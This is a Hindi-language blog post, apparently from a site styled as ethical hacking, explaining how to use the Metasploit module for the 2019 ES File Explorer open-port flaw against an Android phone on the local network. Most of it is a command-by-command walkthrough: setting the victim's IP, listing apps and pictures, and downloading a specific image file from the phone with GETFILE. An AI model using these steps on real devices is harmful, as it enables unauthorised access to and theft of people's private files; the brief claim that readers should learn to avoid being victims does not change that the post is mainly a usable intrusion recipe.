AndroTricks

A WAY OF ETHICAL HACKING

HACK ANDROID USE IP ADDRESS

नमस्कार दोस्तों,

बहुत से मित्रों ने मुझे कहा कि आपने जो Exploit की पोस्टें की है वो आउट डेटेड है? मैं आपको बताना चाहुंगा कि ज्यादातर लोग पायरेटेड विण्डोज और सोफ्टवेयर का उपयोग करते है। जिससे वो अपडेट नहीं होते है।

इस वजह से उन्हें Exploit के द्वारा हैक किया जा सकता है। दूसरा कारण है कि आप लोग इन चीजों को समझे व इनका शिकार होने से बचे।

इसके विपरित फोन में एन्ड्रोयड ओएस फ्री होता है इस वजह से इसकी सारी एप ओटो अपडेट हो जाती है। जो एप एक्सट्रनल इंस्टाल की जाती है वो ओटो अपडेट नहीं होती है।

आप सभी ने ES File Explorer का नाम तो सुना ही होगा। यह एक फाईल एक्सप्लोलर है जो एन्ड्रोयड के लिए बनाया गया है। यह फ्री और पैड दोनों वर्जन में उपलब्ध है। यह प्ले स्टोर पर उपलब्ध नहीं है।

इसका लेटेस्ट वर्जन आप इसकी ओफिशियल साईट से डाउनलोड कर सकते है। यह एक चाईनीज एप है।

ES File Explorer पर एक पोस्ट में पहले भी बना चुका हूं। इसका उपयोग कर हम बिना केबल के फाईल शेयर कर सकते है।

2019 में इसमें एक बहुत खतरनाक Exploit मिला। जिसका उपयोग कर विक्टिम के फोन को एक्सेस किया जा सकता था।

जिसे लोकल नेटर्वक पर ही एक्सेस किया जाता है। जब हम फाईल शेयर के लिये इसे ओपन करते है तब यह एक पोर्ट को लिस्नर पर लगा देता है।

यह Exploit ES File Explorer के वर्जन 4.1.9 तक ही कार्य करता है।

इसे विण्डोज और लाइनेक्स दोनों पर भी Exploit कर सकते है।

कन्ट्रोल विक्टिम फोन मेमोरी डाटा

Pre-requisite

Latest Version Metasploit

How to use?

सबसे पहले मेटास्प्लोइट को ओपर कर, उसमें सर्च करें

Search es_file_explorer

अब use कामाण्ड का प्रयोग करते हुए इसका उपयोग करें।

use auxiliary/scanner/http/es_file_ explorer_open_oprt

info कमाण्ड का उपयोग करके आप इसके बारें में और जानकारी ले सकते है।

RHOST के स्थान पर हमें सिर्फ विक्टिम की आईपी का उपयोग करना है।

set rhost <victim ip>

show options कमाण्ड का उपयोग करके आप चैक कर सकते है कि जानकारी सही है या नहीं?

run or exploit किसी भी कमाण्ड का उपयोग करे, विक्टिम Exploit हो जायेगा।

show actions कमाण्ड का उपयेाग करके आप इसकी सारे कमाण्ड को देख सकते है।

set actions का उपयोग करके, किसी भी कमाण्ड को उपयोग ले सकते है।

set actions LISTAPPS

APPLAUNCH & GETFILE के लिए ACTIONITEM में उनका पाथ एड करना पड़ेगा।

HOW TO DOWNLOADS FILES?

फाईल डाउनलोड करने से पहले हमें फाईल के पाथ की जरूरत पड़ेगे। जैसे की हमें कोई इमेज फाईल डानउलोड करनी है तो पहले LISTPICS कमाण्ड का उपयोग करके फाईल के पाथ को काॅपी कर ले। इस कमाण्ड से फोन की सारी इमेज फाईल आपको दिख जायेगी।

ACTIONITEM set कमाण्ड का उपयोग करे।

set ACTIONITEM + File Path

set ACTIONITEM /sdcard/ VMOSfiletrans ferstation/ IMG- 20200622- WA0012.jpg

अब Action set करें।

set action GETFILE

run कमाण्डा का उपयोग करके RUN करें।

नोट: इससे मल्टीपल फाईल को एक साथ डाउनलोड नहीं कर सकते ।

आशा करता हूं मेरा यह प्रयास आपको पसंद आयेगा।
धन्यवाद!

error: Content is protected !!